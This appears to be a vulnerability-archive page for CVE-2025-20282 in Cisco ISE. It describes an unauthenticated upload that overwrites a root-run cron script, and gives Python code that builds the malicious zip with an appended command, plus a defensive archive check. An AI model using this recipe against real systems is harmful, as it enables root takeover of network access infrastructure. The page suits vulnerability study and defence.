Related vulnerability
Title: Cisco ISE and Cisco ISE-PIC security vulnerability (CVE-2025-20282)
Description: Cisco ISE and Cisco ISE-PIC are products of Cisco (USA). Cisco ISE is a NAC solution used to manage access by endpoints, users and devices to network resources in a zero-trust architecture. Cisco ISE-PIC is a component of it. Cisco ISE and Cisco ISE-PIC contain a security vulnerability caused by insufficient file validation, which can allow arbitrary files to be uploaded and executed.
Description
Proof of concept of CVE-2025-20282, the perfect 10.
Introduction
Cisco ISE CVE 2025-20282
Proof of concept
Writeup: https://riversecurity.eu/like-stealing-cisco-ise-cream-from-a-kid-weaponizing-a-cve/
The Python script abuses the file upload function that is available unauthenticated at /admin/files-upload/.
The script locally creates a bin folder containing a file named isehourlycron.sh and fills it with the original content of that file from the Cisco ISE installation (located in the /opt/CSMS/bin folder); that original content is base64-encoded and embedded in the script.
A command is then appended to the end of the file, unless you specify "--reset", in which case no command is added and the file is reverted to its original content.
The script then zips that folder recursively, with its contents, into a file named output.zip.
The file is then uploaded to the ISE installation via /admin/files-upload/.
On the Cisco ISE side, output.zip is placed in /tmp/ and all of its contents are extracted into the /opt/CSCOcpm/ folder, overwriting the existing isehourlycron.sh.
isehourlycron.sh runs as root several times an hour, which gives remote code execution as root.
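The payload-building step described above, together with the check a defender would run against such an archive, as an added example that is not the PoC's own script. The genuine isehourlycron.sh content is replaced by a constructed placeholder (ORIGINAL_SCRIPT_B64); the real PoC embeds the actual Cisco file. The HTTP upload to /admin/files-upload/ is not reproduced here because the page does not document the request format. The names build_script(), build_zip(), build_zip_with_entries(), risky_entries() and EXTRACT_ROOT are this example's own.

```python
import base64
import io
import posixpath
import zipfile
from typing import Dict, List, Optional, Tuple

# Constructed placeholder for the stock Cisco ISE cron script. The real PoC
# embeds the genuine file as base64; this body is an assumption for the example.
ORIGINAL_SCRIPT_B64 = base64.b64encode(
    b"#!/bin/bash\n# isehourlycron.sh (placeholder body, constructed for this example)\n"
    b"echo hourly\n"
).decode()

# Where ISE unpacks the uploaded archive, per the writeup above.
EXTRACT_ROOT = "/opt/CSCOcpm"
# The archive entry that lands on the root-run cron script.
TARGET_ENTRY = "bin/isehourlycron.sh"


def build_script(command: Optional[str]) -> bytes:
    """Return the cron script body: the original content with `command`
    appended on its own line, or the untouched original when command is None
    (the --reset case)."""
    body = base64.b64decode(ORIGINAL_SCRIPT_B64)
    if command is None:
        return body
    if not body.endswith(b"\n"):
        body += b"\n"
    return body + command.encode() + b"\n"


def build_zip_with_entries(entries: Dict[str, bytes]) -> bytes:
    """Build a zip in memory from {entry_name: content}, marking every entry
    executable (0755) so it stays runnable after extraction."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            info = zipfile.ZipInfo(name)
            info.external_attr = 0o755 << 16
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
    return buf.getvalue()


def build_zip(command: Optional[str]) -> bytes:
    """Mirror the PoC's 'zip the bin folder recursively' step: one archive
    holding bin/isehourlycron.sh with the chosen (or reset) content."""
    return build_zip_with_entries({TARGET_ENTRY: build_script(command)})


def risky_entries(zip_bytes: bytes, extract_root: str = EXTRACT_ROOT) -> List[Tuple[str, str]]:
    """Defender-side check for an archive that will be extracted under
    extract_root: report members that escape the root (path traversal) or
    that overwrite a shell script under bin/, which cron runs as root."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            dest = posixpath.normpath(posixpath.join(extract_root, name))
            if name.startswith("/") or not dest.startswith(extract_root + "/"):
                findings.append((name, "escapes extraction root"))
            elif dest.startswith(extract_root + "/bin/") and name.endswith(".sh"):
                findings.append((name, "overwrites a script under bin/ run as root by cron"))
    return findings


if __name__ == "__main__":
    payload = build_zip("id > /tmp/pwned")
    for entry, reason in risky_entries(payload):
        print(f"{entry}: {reason}")
```

The check in risky_entries() is the one an upload handler that extracts archives into a privileged directory should perform before extraction: reject any member whose normalised destination leaves the extraction root, and refuse to overwrite executables that run with higher privileges than the uploader. Note that rejecting the archive is only a mitigation for this path; the root cause on the page is that the endpoint accepts the upload without authentication at all.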
File snapshot
[4.0K] /data/pocs/2f6cbd043fdca9218e0213cd326a6d6f949e226e
├── [ 64K] CVE-2025-20282 - v2.py
└── [1.0K] README.md
1 directory, 2 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for or donating to the local PoC archive. Thank you for your support.